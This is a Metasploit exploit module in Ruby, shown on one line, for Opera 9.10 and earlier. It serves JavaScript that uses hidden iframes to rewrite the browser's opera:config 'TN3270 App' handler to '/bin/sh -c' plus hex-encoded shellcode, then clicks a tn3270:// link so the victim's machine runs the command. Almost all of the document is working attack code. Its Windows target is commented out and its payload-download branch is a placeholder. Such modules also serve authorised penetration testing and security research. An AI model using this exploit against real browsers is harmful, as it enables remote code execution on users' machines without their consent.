Opera <= 9.10 Configuration Overwrite

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::OPERA, :ua_ver => "1.0", :os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ], :javascript => true, :rank => ExcellentRanking, # reliable exe writer :vuln_test => nil, }) def initialize(info = {}) super(update_info(info,{ 'Name' => 'Opera 9 Configuration Overwrite', 'Description' => %q{ Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code. }, 'License' => BSD_LICENSE, 'Author' => [ 'egypt', # stolen from mpack ], 'Version' => '$Revision: 6655 $', 'References' => [ ], 'Payload' => { 'ExitFunc' => 'process', 'Space' => 2048, 'DisableNops' => true, 'BadChars' => " |'<>&", }, 'Targets' => [ #[ 'Opera < 9.10 Windows', # { # 'Platform' => 'win', # 'Arch' => ARCH_X86, # } #], [ 'Opera < 9.10 Unix Cmd', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, } ], ], # Not sure when this was disclosed but it's been known since at # least March 5, 2007, since that's the release date on the version # of mpack I stole this from. 'DisclosureDate' => 'Mar 5 2007' })) end def on_request_uri(cli, request) case request.uri when /payload$/ print_status("Generating payload for #{target} #{target.platform}") # Re-generate the payload if ((p = regenerate_payload(cli)) == nil) print_error("Payload generation failed, 404ing request for #{request.uri}") send_not_found(cli) return end # NOTE: Change this to the new API when commiting to trunk #content = Msf::Util::EXE.to_win32pe(p.encoded) #content = Rex::Text.to_win32pe(p.encoded) content = "foo" print_status("Generated #{content.length} bytes") headers = { 'Content-Type' => 'application/octet-stream' } when get_resource print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") content = "<body><script>" content << generate_evil_js(cli, request) content << "</script></body>" headers = { 'Content-Type' => 'text/html' } else print_status("404ing request for #{request.uri}") send_not_found(cli) return end send_response_html(cli, content, headers) end def generate_evil_js(cli, request) # There are a bunch of levels of quotes here, so the easiest way to # make everything line up is to hex escape the command to run p = regenerate_payload(cli).encoded #print_status(p) shellcode = Rex::Text.to_hex(p, "%") js = <<ENDJS blank_iframe = document.createElement('iframe'); blank_iframe.src = 'about:blank'; blank_iframe.setAttribute('id', 'blank_iframe_window'); blank_iframe.setAttribute('style', 'display:none'); document.body.appendChild(blank_iframe); blank_iframe_window.eval( "config_iframe = document.createElement('iframe');" + "config_iframe.setAttribute('id', 'config_iframe_window');" + "config_iframe.src = 'opera:config';" + "document.body.appendChild(config_iframe);" + "cache_iframe = document.createElement('iframe');" + "cache_iframe.src = 'opera:cache';" + "cache_iframe.onload = function ()" + "{" + " config_iframe_window.eval" + " (\\"" + " old_handler = opera.getPreference('Network','TN3270 App');" + " shellcode = '#{shellcode}';" + " opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" + " app_link = document.createElement('a');" + " app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" + " app_link.click();" + " setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" + " \\");" + "};" + "document.body.appendChild(cache_iframe);" + ""); ENDJS end def generate_evil_preference() end end